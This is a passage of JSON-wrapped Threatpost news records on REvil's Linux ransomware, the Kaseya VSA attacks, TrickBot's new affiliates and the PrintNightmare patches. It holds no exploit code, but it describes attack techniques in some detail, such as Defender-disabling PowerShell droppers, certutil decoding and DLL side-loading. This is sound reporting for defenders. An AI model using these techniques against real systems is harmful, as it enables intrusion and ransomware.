The unusual move is an attempt to target VMware\u2019s ESXi virtual machine management software and network attached storage (NAS) devices that run on the Linux operating system (OS).\n\nResearchers at AT&T Cybersecurity said they have confirmed four Linux samples of the REvil malware in the wild.\n\nOfer Caspi, security researcher at Alien Labs, a division of AT&T Cybersecurity, wrote[ in a Thursday blog](<https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version>) that after receiving a tip from [MalwareHuntingTeam](<https://twitter.com/malwrhunterteam/status/1409577829289934851?s=20>) it identified the four samples.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cREvil ransomware authors have expanded their arsenal to include Linux ransomware, which allows them to target ESXi and NAS devices,\u201d Caspi wrote.\n\nIn a nod to research by [AdvIntel](<https://twitter.com/y_advintel/status/1391450354051653633>) in early May 2021, which reported REvil\u2019s intent to port its Windows-based ransomware to Linux, Caspi confirmed the Linux variant was spotted in May \u201caffecting *nix systems and ESXi.\u201d\n\n\u201cThe samples are ELF-64 executables, with similarities to the Windows REvil executable, being the most noticeable among the configuration options,\u201d he wrote.\n\nExecutable and Linkable Format (or ELF-64) is a standard file format for executable files within Linux and UNIX-like operating systems, [according to a technical breakdown](<https://0xax.gitbooks.io/linux-insides/content/Theory/linux-theory-2.html>).\n\n## **Linux Ransomware: Rare, but Real **\n\nWhat makes Alien Labs\u2019 discovery of the Linux REvil variant unique is that the Linux, Unix and other Unix-like computer operating systems, are not typically targeted by adversaries. Microsoft Windows computer systems generally deliver the biggest return for an attacker\u2019s effort because of the ubiquity of the OS. 
Furthermore, instances of Linux are generally well-protected against vulnerabilities, thanks to a tightknit user-base delivering fast security updates.\n\nPast examples of Linux malware over the past several years have included Tycoon, Lilocked (or Lilu) and [QNAPCrypt](<https://threatpost.com/qnap-flaws-plague-nas-systems/161924/>). In November, Kaspersky identified a Linux sample of RansomEXX. Researchers noted that criminals based its Linux variant on \u201cWinAPI (functions specific to Windows OS)\u201d and used a similar mechanism to manipulate targeted Linux MBED TLS libraries.\n\nMBED TLS is an implementation of the TLS and SSL protocols distributed under the Apache License.\n\n\u201cThe Apache license itself has nothing to do with web servers, other than it being one of the more widely used pieces of software that uses the license, among hundreds of thousands of other open source projects,\u201d said Kenneth White, director of the Open Crypto Audit Project.\n\nIn May, researchers noted criminals behind the [DarkSide ransomware also released a Linux variant](<https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html>). Attackers also targeted, \u201cvirtual machine-related files on VMware ESXI servers.\u201d Researchers said the malware \u201cparses its embedded configuration, kills virtual machines, encrypts files on the infected machine, collects system information, and sends it to the remote server.\u201d\n\n## **Targeted Attacks: Linux in the Crosshairs **\n\nVMware ESXi, formerly known as ESX, is a bare metal hypervisor that installs easily on to your server and partitions it into multiple virtual machines (VM).\n\n\u201cThe hypervisor ESXi allows multiple virtual machines to share the same hard drive storage. However, this also enables attackers to encrypt the centralized virtual hard drives used to store data from across VMs, potentially causing disruptions to companies,\u201d Alien Labs reported. 
\u201c[I]n addition to targeting ESXi, REvil is also targeting NAS devices as another storage platform with the potential to highly impact the affected companies.\u201d\n\nResearchers said the Linux version of REvil share similar attributes to the Windows OS variant. \u201cThe [executable\u2019s] configuration file format is very similar to the one observed for REvil Windows samples, but with fewer fields,\u201d Caspi wrote.\n\nSimilarities also include:\n\n * Base64-encoded value containing the attacker\u2019s public key used to encrypt files.\n * Ransomware-as-a-service (RaaS) affiliate identifier (7987) is shared between both operating systems.\n * The ransom note\u2019s body content is encoded in base64.\n * The encrypted extensions, which appears to be five random character, both are: .rhkrc, .qoxaq, .naixq, and . 7rspj.\n\n\u201cThe threat actors behind REvil RaaS have rapidly developed a Linux version to compete against the recently released Linux version of DarkSide. It is hard to clarify if these two RaaS are competing against each other or collaborating team members, as stated by other security researchers,\u201d researchers wrote.\n\n_**(This article was updated 7/6 at 12:40 p.m. 
ET to reflect a clarification on the nature of the Apache software license in the context of MBED TLS.)**_\n\n**Check out our free **[**upcoming live and on-demand webinar events**](<https://threatpost.com/category/webinars/>)** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**\n", "cvss3": {}, "published": "2021-07-01T20:56:15", "type": "threatpost", "title": "Linux Variant of REvil Ransomware Targets VMware\u2019s ESXi, NAS Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-01T20:56:15", "id": "THREATPOST:CA70B877BD3855C30DBA388CA828583A", "href": "https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-07T18:25:01", "description": "UPDATE 2\n\nThe worldwide July 2 attacks on the Kaseya Virtual System/Server Administrator (VSA) platform by the REvil ransomware gang turn out to be the result of exploits for at least one zero-day security vulnerability, and the company is swinging into full mitigation mode, with patches for the on-premise version coming sometime this week, it said.\n\nThe VSA software is used by Kaseya customers to remotely monitor and manage software and network infrastructure. 
It\u2019s supplied either as a hosted cloud service by Kaseya, or via on-premises VSA servers.\n\nThe attacks on the VSA (details on the multiple zero-day bugs believed used are below) are now estimated to have led to the encryption of files for around 60 Kaseya customers using the on-premises version of the platform \u2013 many of which are managed service providers (MSPs) who use VSA to manage the networks of other businesses.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThat MSP connection allowed REvil access to those customers-of-customers, and there are around 1,500 downstream businesses now affected, Kaseya said in an [updated rolling advisory](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>). It\u2019s estimated that more than a million individual systems are locked up, and Kaspersky [on Monday said](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) that it had seen more than 5,000 attack attempts in 22 countries at that point.\n\n\u201cThe VSA server is used to manage large fleets of computers, and is normally used by MSPs to manage all their clients,\u201d explained researchers at TruSec, [in a post](<https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/>) on Sunday. \u201cWithout separation between client environments, this creates a dependency: If the VSA server is compromised, all client environments managed from this server can be compromised too.\u201d\n\nIt added, \u201cAdditionally, if the VSA server is exposed to internet, any potential vulnerability could be leveraged over the internet to breach the server. This is what happened in this case. The threat actor, an affiliate of the REvil ransomware-as-a-service, identified and exploited a zero-day vulnerability in the VSA server. 
The vulnerability was exploited to introduce a malicious script to be sent to all computers managed by the server, therefore reaching all the end clients. The script delivered the REvil ransomware and encrypted the systems.\u201d\n\nThus, while customers wait for patches, \u201cAll on-premises VSA servers should continue to remain offline until further instructions from Kaseya about when it is safe to restore operations,\u201d Kaseya said. \u201cA patch will be required to be installed prior to restarting the VSA and a set of recommendations on how to increase your security posture.\u201d\n\nMeanwhile, \u201cwe have been advised by our outside experts, that customers who experienced ransomware and receive communication from the attackers should not click on any links \u2013 they may be weaponized,\u201d the firm added.\n\nThe company has also released a new version of a [compromise detection tool](<https://kaseya.box.com/s/p9b712dcwfsnhuq2jmx31ibsuef6xict>) for companies to analyze a system (either VSA server or managed endpoint) and determine whether any indicators of compromise (IoC), data encryption or the REvil ransom note are present.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and the FBI also offered joint [protection advice](<https://threatpost.com/kaseya-attack-fallout/167541/>) over the weekend for those not yet affected by the attacks.\n\nKaseya also took the software-as-a-service (SaaS) platform offline, reducing significantly the number of customers exposed to the internet and therefore for to attacks. Though it was scheduled to be back online Tuesday (the kickoff will be a staged comeback that will see functionality turned back on in waves), but Kaseya said that it ran into a problem with the update. 
It now plans to start restoring SaaS services no later than the evening of Thursday, July 8.\n\nAs for the on-prem patch, the company will be publishing a runbook Wednesday of the changes customers must to make to their environment to prepare for the patch release, which is now expected by Friday.\n\n### Planned Enhanced Security Measures\n\nAccording to Kaseya, the enhanced security measures that will be brought online with the SaaS update are:\n\n * 24/7 independent SOC for every VSA with the ability to quarantine and isolate files and entire VSA servers.\n * A complementary CDN with WAF for every VSA (including for on-premise users that opt-in and wish to use it)\n * Customers who whitelist IPs will be required to whitelist additional IPs.\n\nThis \u201cgreatly reduces the attack surface of Kaseya VSA overall,\u201d the company said.\n\n## **REvil Lowers Ransom for Universal Decryptor**\n\nREvil is offering a universal public decryption key that will remediate all impacted victims, it said. While the initial ransom price was $70 million, the gang has lowered its asking price to $50 million [according to one researcher](<https://twitter.com/jackhcable/status/1411906687968161792>).\n\nAbsent a universal decryptor, some impacted companies are turning to individual negotiations with REvil, according [to reports](<https://www.databreaches.net/some-kaseya-victims-privately-negotiating-with-revil/>). For instance, researcher Marco A. 
De Felice [described (in Italian)](<https://www.suspectfile.com/kaseya-data-breach-70m-per-il-decrittatore-universale-intanto-revil-tratta-privatamente-con-alcune-vittime/>) a set of observed chat logs, with various individual company ransoms being listed at $550,000 (and then lowered to $225,000), and in another case the ransom was less than $50,000.\n\nUnfortunately, for those already infected by the REvil ransomware, the ability to remediate an attack will come down to case-by-case security postures, such as having offline backups of files in place.\n\n\u201cREvil uses the Salsa20 symmetric stream algorithm for encrypting the content of files and the keys for it with an elliptic curve asymmetric algorithm,\u201d according to Kaspersky researchers. \u201cDecryption of files affected by this malware is impossible without the cybercriminals\u2019 keys due to the secure cryptographic scheme and implementation used in the malware.\u201d\n\n## **Zero Days, Not SolarWinds Part 2**\n\nThe attack itself appears to be more akin to the [Accellion attacks](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>) that cropped up all spring rather than the devastating [SolarWinds supply-chain attack](<https://threatpost.com/solarwinds-attackers-dhs-emails/165110/>) earlier this year.\n\nThe former had to do with zero-day vulnerabilities that were present in the Accellion legacy File Transfer Appliance product. Bad actors with connections to the FIN11 and the Clop ransomware gang hit multiple Accellion FTA customers in the financially motivated attacks, including the Jones Day Law Firm, Kroger and Singtel. All received extortion emails threatening to publish stolen data on the \u201cCL0P^_- LEAKS\u201d .onion website.\n\nSolarWinds meanwhile was an attack that the U.S. 
attributed to the Russian government, which involved tampering with SolarWinds\u2019 back-end systems in order to push a boobytrapped software update to unsuspecting customers containing a backdoor. Follow-on espionage attacks then were attempted targeting tech firms and several U.S. government agencies.\n\nIn the Kaseya case, adversaries are exploiting at least one zero-day security vulnerability, to push ransomware to Kaseya\u2019s customers.\n\n\u201cThe attackers were able to exploit zero-day vulnerabilities in the VSA product to bypass authentication and run arbitrary command execution,\u201d the company [noted](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403584098961>) in its technical incident analysis. \u201cThis allowed the attackers to leverage the standard VSA product functionality to deploy ransomware to endpoints. There is no evidence that Kaseya\u2019s VSA codebase has been maliciously modified.\u201d\n\nKaseya knew about one bug (CVE-2021-30116) before the attacks started \u2013 it had been reported to the company by the Dutch Institute for Vulnerability Disclosure (DIVD).\n\n\u201cDuring the entire process, Kaseya has shown that they were willing to put in the maximum effort and initiative into this case both to get this issue fixed and their customers patched,\u201d according to [a DIVD advisory](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>). \u201cThey showed a genuine commitment to do the right thing. 
Unfortunately, we were beaten by REvil in the final sprint, as they could exploit the vulnerabilities before customers could even patch.\u201d\n\nSeparately, researchers at Huntress Labs identified a zero-day used in the attack, though it\u2019s unclear if it\u2019s separate from CVE-2021-30116: \u201cHuntress has confirmed that cybercriminals have exploited an arbitrary file upload and code injection vulnerability and have high confidence an authentication bypass was used to gain access into these servers,\u201d [it said](<https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>).\n\nTruSec meanwhile noted that \u201c[while] not all details have been confirmed yet, but we can say with high confidence that the exploit involved multiple flaws: Authentication bypass; arbitrary file upload; code injection.\u201d\n\nAccording to Kaspersky, the exploit involves the attackers deploying a malicious dropper via a PowerShell script. That script disables Microsoft Defender features and then uses the certutil.exe utility to decode a malicious executable (agent.exe) that drops an older version of Microsoft Defender, along with the REvil ransomware packed into a malicious library. That library is then loaded by the legitimate MsMpEng.exe by utilizing the DLL side-loading technique, according to the firm.\n\nOther technical details on the bug and attack chain are scant, for now.\n\nKaseya is due to post another update Tuesday morning, and Threatpost will update this post accordingly.\n\n**Update 2: This post was updated at 2:15 p.m. ET on July 7 to reflect a revised patch timeline and expected debut of a runbook for preparing for the patch.**\n\n**Update 1: This post was updated at 10:30 a.m. 
ET on July 7 to include a revised patch timeline and planned enhanced security measures.**\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-06T15:42:42", "type": "threatpost", "title": "Kaseya Patches Imminent After Zero-Day Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-06T15:42:42", "id": "THREATPOST:DBAD1B8DE4447AB94094A76E7F0EF6A1", "href": "https://threatpost.com/kaseya-patches-zero-day-exploits/167548/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-15T18:06:14", "description": "The cybercriminals behind the infamous TrickBot trojan have signed two additional distribution affiliates, dubbed Hive0106 (aka TA551) and Hive0107 by IBM X-Force. The result? Escalating ransomware hits on corporations, especially using the Conti ransomware.\n\nThe development also speaks to the TrickBot gang\u2019s increasing sophistication and standing in the cybercrime underground, IBM researchers said: \u201cThis latest development demonstrates the strength of its connections within the cybercriminal ecosystem and its ability to leverage these relationships to expand the number of organizations infected with its malware.\u201d\n\nThe TrickBot malware started life as a banking trojan back in 2016, but it quickly evolved to become a modular, full-service threat. 
It\u2019s capable of a range of backdoor and data-theft functions, can deliver additional payloads, and has the ability to quickly [move laterally](<https://threatpost.com/trickbot-port-scanning-module/163615/>) throughout an enterprise.\n\nAccording to IBM, the TrickBot gang (aka ITG23 or Wizard Spider) has now added powerful additional distribution tactics to its bag of tricks, thanks to the two new affiliates.\n\n\u201cEarlier this year, [the TrickBot gang] primarily relied on email campaigns delivering Excel documents and a call-center ruse known as BazarCall to deliver its payloads to corporate users,\u201d IBM researchers said in a [Wednesday analysis](<https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/>). \u201cHowever\u2026the new affiliates have added the use of hijacked email threads and fraudulent website customer-inquiry forms. This move not only increased the volume of its delivery attempts but also diversified delivery methods with the goal of infecting more potential victims than ever.\u201d\n\nBazarCall is a [distribution tactic](<https://unit42.paloaltonetworks.com/bazarloader-malware/>) that starts with emails offering \u201ctrial subscriptions\u201d to various services \u2013 with a phone number listed to call customer service to avoid being charged money. If someone calls, a call-center operator answers and directs victims to a website to purportedly unsubscribe from the service: a process the \u201cagent\u201d walks the caller through. In the end, vulnerable computers become infected with malware \u2013 usually the [BazarLoader implant](<https://threatpost.com/bazarloader-malware-slack-basecamp/165455/>), which is another malware in the TrickBot gang\u2019s arsenal, and sometimes TrickBot itself. 
These types of attacks have continued into the autumn, enhanced by the fresh distribution approaches, according to IBM.\n\nMeanwhile, since 2020, the TrickBot gang has been heavily involved in the ransomware economy, with the TrickBot malware acting as an initial access point in campaigns. Users infected with the trojan will see their device become part of a botnet that attackers typically use to load the second-stage ransomware variant. The operators have developed their own ransomware as well, according to IBM: the Conti code, which is notorious for hitting hospitals, [destroying backup files](<https://threatpost.com/conti-ransomware-backups/175114/>) and pursuing [double-extortion tactics](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>).\n\nIBM noted that since the two affiliates came on board in June, there\u2019s been a corresponding increase in Conti ransomware attacks \u2013 not likely a coincidence.\n\n\u201cRansomware and extortion go hand in hand nowadays,\u201d according to the firm\u2019s analysis. \u201c[The TrickBot gang] has also adapted to the ransomware economy through the creation of the Conti ransomware-as-a-service (RaaS) and the use of its BazarLoader and Trickbot payloads to gain a foothold for ransomware attacks.\u201d\n\n## **Affiliate Hive0106: Spam Powerhouse **\n\nIBM X-Force researchers noted that the most important development since June for the distribution of the TrickBot gang\u2019s various kinds of malware is the newly minted partnership with Hive0106 (aka TA551, Shathak and UNC2420).\n\nHive0106 specializes in massive volumes of spamming and is a financially motivated threat group that\u2019s lately been looking to partner with elite cybercrime gangs, the firm said.\n\nHive0106 campaigns begin with hijacking email threads: a tactic pioneered by its frenemy [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>). 
The tactic involves [jumping into ongoing correspondence](<https://unit42.paloaltonetworks.com/emotet-thread-hijacking/>) to respond to an incoming message under the guise of being the rightful account holder. These existing email threads are stolen from email clients during prior infections. Hive0106 is able to mount these campaigns at scale, researchers said, using newly created malicious domains to host malware payloads.\n\n\u201cThe emails include the email thread subject line but not the entire thread,\u201d according to IBM X-Force\u2019s writeup. \u201cWithin the email is an archive file containing a malicious attachment and password.\u201d\n\nIn the new campaigns, that malicious document drops an HTML application (HTA) file when macros are enabled.\n\n\u201cHTA files contain hypertext code and may also contain VBScript or JScript scripts, both of which are often used in boobytrapped macros,\u201d according to the analysis. \u201cThe HTA file then downloads Trickbot or BazarLoader, which has subsequently been observed downloading Cobalt Strike.\u201d\n\nCobalt Strike is the legitimate pen-testing tool that\u2019s [often abused by cybercriminals](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) to help with lateral movement. It\u2019s often a precursor to a ransomware infection.\n\n## **Hive0107 Comes on Board**\n\nAnother prominent affiliate that hooked its wagon up to the TrickBot gang this summer is Hive0107, which spent the first half of the year distributing the IcedID trojan (a [TrickBot rival](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>)). 
It switched horses to TrickBot in May, using its patented contact form distribution method.\n\nAnalysts \u201cobserved Hive0107 with occasional distribution campaigns of the Trickbot malware detected mid-May through mid-July 2021\u2026after that period, Hive0107 switched entirely to delivering BazarLoader,\u201d according to the researchers, who added that most of the campaigns target organizations in the U.S. and, to a lesser extent, Canada and Europe.\n\nHive0107 is well-known for using customer contact forms on company websites to send malicious links to unwitting employees. Usually, the messages it sends threaten legal action, according to the analysis.\n\nPreviously, the cybercriminals used copyright infringement as a ruse: \u201cThe group typically enters information into these contact forms \u2014 probably using automated methods \u2014 informing the targeted organization that it has illegally used copyrighted images and includes a link to their evidence,\u201d IBM X-Force researchers explained.\n\nIn the new campaigns, Hive0107 is using a different lure, the researchers said, claiming that the targeted company has been performing distributed denial-of-service (DDoS) attacks on its servers. Then, the messages provide a (malicious) link to purported evidence and how to remedy the situation.\n\nThe group also sends the same content via email to organization staff \u2013 an additional switch-up in tactics.\n\nIn any event, the links are hosted on legitimate cloud storage services where the payload lives, according to the analysis.\n\n\u201cClicking on the link downloads a .ZIP archive containing a malicious JScript (JS) downloader titled \u2018Stolen Images Evidence.js\u2019 or \u2018DDoS attack proof and instructions on how to fix it.js,'\u201d researchers explained. 
\u201cThe JS file contacts a URL on newly created domains to download BazarLoader.\u201d\n\nBazarLoader then goes on to download Cobalt Strike and a PowerShell script to exploit the [PrintNightmare vulnerability](<https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/>) (CVE-2021-34527), they added \u2013 and sometimes TrickBot.\n\n\u201cIBM suspects that access achieved through these Hive0107 campaigns is ultimately used to initiate a ransomware attack,\u201d the researchers noted.\n\nThe new affiliate campaigns are evidence of the TrickBot gang\u2019s continuing success breaking into the circle of the cybercriminal elite, the firm concluded \u2013 a trend IBM X-Force expects to continue into next year.\n\n\u201c[The gang] started out aggressively back in 2016 and has become a cybercrime staple in the Eastern European threat-actor arena,\u201d researchers said. \u201cIn 2021, the group has repositioned itself among the top of the cybercriminal industry.\u201d\n\nThey added, \u201cThe group already has demonstrated its ability to maintain and update its malware and infrastructure, despite the efforts of law enforcement and industry groups [to take it down](<https://threatpost.com/authorities-arrest-trickbot-member/169236/>).\u201d\n\n## **How to Protect Companies When TrickBot Hits**\n\nTo reduce the chances of suffering catastrophic damage from an infection (or a follow-on ransomware attack), IBM recommends taking the following steps:\n\n * **Ensure you have backup redundancy**, stored separately from network zones attackers could access with read-only access. 
The availability of effective backups is a significant differentiator for organizations and can support recovery from a ransomware attack.\n * **Implement a strategy to prevent unauthorized data theft**, especially as it applies to uploading large amounts of data to legitimate cloud storage platforms that attackers can abuse.\n * **Employ user-behavior analytics** to identify potential security incidents. When triggered, assume a breach has taken place. Audit, monitor and quickly act on suspected abuse related to privileged accounts and groups.\n * **Employ multi-factor authentication** on all remote access points into an enterprise network.\n * **Secure or disable remote desktop protocol (RDP).** Multiple ransomware attacks have been known to exploit weak RDP access to gain initial entry into a network.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls **_](<https://threatpost.com/category/webinars/>)_**\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-15T18:05:29", "type": "threatpost", "title": "TrickBot Gang Enters Cybercrime Elite with Fresh Affiliates", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-10-15T18:05:29", "id": "THREATPOST:827A7E3B49365A0E49A11A05A5A29192", "href": "https://threatpost.com/trickbot-cybercrime-elite-affiliates/175510/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T07:53:10", "description": "Microsoft has released an emergency patch for the PrintNightmare, a set of two critical remote code-execution (RCE) vulnerabilities in the Windows Print Spooler service that hackers can use to take over an infected system. However, more fixes are necessary before all Windows systems affected by the bug are completely protected, according to the federal government.\n\nMicrosoft on Tuesday released an [out-of-band update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for several versions of Windows to address [CVE-2021-34527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527>), the second of two bugs that were initially thought to be one flaw and which have been dubbed PrintNightmare by security researchers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nHowever, the latest fix only appears to address the RCE variants of PrintNightmare, and not the local privilege escalation (LPE) variant, according to an [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/06/microsoft-releases-out-band-security-updates-printnightmare>) by the Cybersecurity Infrastructure and Security Administration (CISA), citing a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) published by the CERT Coordination Center (CERT/CC).\n\nMoreover, the updates do not include Windows 10 version 1607, Windows Server 2012 or Windows Server 2016, which will be patched at a later date, according to CERT/CC.\n\n## **A Tale of Two Vulnerabilities**\n\nThe PrintNightmare saga [began last 
Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) when a proof-of-concept (PoC) exploit for the vulnerability \u2014 at that time tracked as CVE-2021-1675 \u2014 was dropped on GitHub showing how an attacker can exploit the vulnerability to take control of an affected system. While it was taken back down within a few hours, the code was copied and remains in circulation on the platform.\n\nThe response to the situation soon turned into confusion. Though Microsoft released an [patch for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) in it its usual raft of [monthly Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>), addressing what it thought was a minor EoP vulnerability, the listing was updated later in the week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, it soon became clear to many experts that Microsoft\u2019s initial patch didn\u2019t fix the entire problem. CERT/CC on Thursday offered its own workaround for PrintNightmare, advising system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print.\n\nTo further complicate matters, Microsoft also last Thursday dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appeared to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote in the advisory at the time. \u201cThe attack vector is different as well. 
CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\n## **Microsoft Issues Incomplete Patch**\n\nThe fix released this week addresses CVE-2021-34527, and includes protections for CVE-2021-1675, according to the CISA, which is encouraging users and administrators to review the [Microsoft Security Updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) as well as [CERT/CC Vulnerability Note VU #383432](<https://www.kb.cert.org/vuls/id/383432>) and apply the necessary updates or workarounds.\n\nBut as noted, it won\u2019t fix all systems.\n\nSo, in cases where a system is not protected by the patch, Microsoft is offering several workarounds for PrintNightmare. One is very similar to the federal government\u2019s solution from last week: To stop and disable the Print Spooler service \u2014 and thus the ability to print both locally and remotely \u2014 by using the following PowerShell commands: Stop-Service -Name Spooler -Force and Set-Service -Name Spooler -StartupType Disabled.\n\nThe second workaround is to disable inbound remote printing through Group Policy by disabling the \u201cAllow Print Spooler to accept client connections\u201d policy to block remote attacks, and then restarting the system. In this case, the system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\nAnother potential option to prevent remote exploitation of the bug that has worked in \u201climited testing\u201d is to block both the RPC Endpoint Mapper (135/tcp) and SMB (139/tcp and 445/tcp) at the firewall level, according to CERT/CC. 
However, \u201cblocking these ports on a Windows system may prevent expected capabilities from functioning properly, especially on a system that functions as a server,\u201d the center advised.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-07T10:55:02", "type": "threatpost", "title": "Microsoft Releases Emergency Patch for PrintNightmare Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T10:55:02", "id": "THREATPOST:6F7C157D4D3EB409080D90F02185E728", "href": "https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-19T16:25:33", "description": "Microsoft has warned of yet another vulnerability that\u2019s been discovered in its Windows Print Spooler that can allow attackers to elevate privilege to gain full user rights to a system. The advisory comes on the heels of patching two other remote code-execution (RCE) bugs found in the print service that collectively became known as PrintNightmare.\n\nThe company released [the advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) late Thursday for the latest bug, a Windows Print Spooler elevation-of-privilege vulnerability tracked as [CVE-2021-34481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34481>). 
Microsoft credited Dragos vulnerability researcher Jacob Baines for identifying the issue.\n\nThe vulnerability \u201cexists when the Windows Print Spooler service improperly performs privileged file operations,\u201d according to Microsoft.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAttackers who successfully exploit the bug can run arbitrary code with SYSTEM privileges, allowing them to install programs, view, change or delete data, or create new accounts with full user rights, the company said.\n\nTo work around the bug, administrators and users should stop and disable the Print Spooler service, Microsoft said.\n\n## **Slightly Less of a \u2018PrintNightmare\u2019**\n\nThe vulnerability is the latest in a flurry of problems discovered in Windows Print Spooler, but seems slightly less dangerous, as it can only be exploited locally. It rates 7.8 out of 10 on the CVSS vulnerability-severity scale.\n\nIndeed, [Baines told BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/microsoft-shares-guidance-on-new-windows-print-spooler-vulnerability/>) that while the bug is print driver-related, \u201cthe attack is not really related to PrintNightmare.\u201d Baines plans to disclose more about the little-known vulnerability in [an upcoming presentation](<https://defcon.org/html/defcon-29/dc-29-speakers.html#baines>) at DEF CON in August.\n\nThe entire saga surrounding Windows Print Spooler [began Tuesday, June 30](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>), when a proof-of-concept (PoC) for an initial vulnerability in the print service was dropped on GitHub showing how an attacker can exploit the flaw to take control of an affected system.\n\nThe response to the situation soon turned into confusion. 
Though Microsoft released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>) in it its usual raft of [monthly Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>), fixing what it thought was a minor elevation-of-privilege vulnerability, the listing was updated later in the week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, soon after it became clear to many experts that Microsoft\u2019s initial patch didn\u2019t fix the entire problem. The federal government even stepped in last Thursday, when CERT/CC [offered its own mitigation](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>) for PrintNightmare that Microsoft has since adopted \u2014 advising system administrators to disable the Windows Print Spooler service in Domain Controllers and systems that do not print.\n\nTo further complicate matters, Microsoft also last Thursday dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appeared to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527. The company explained that the second bug was similar to the earlier PrintNightmare vulnerability but also its own distinct entity.\n\nEventually, Microsoft last Wednesday [released an emergency cumulative patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>) for both PrintNightmare bugs that 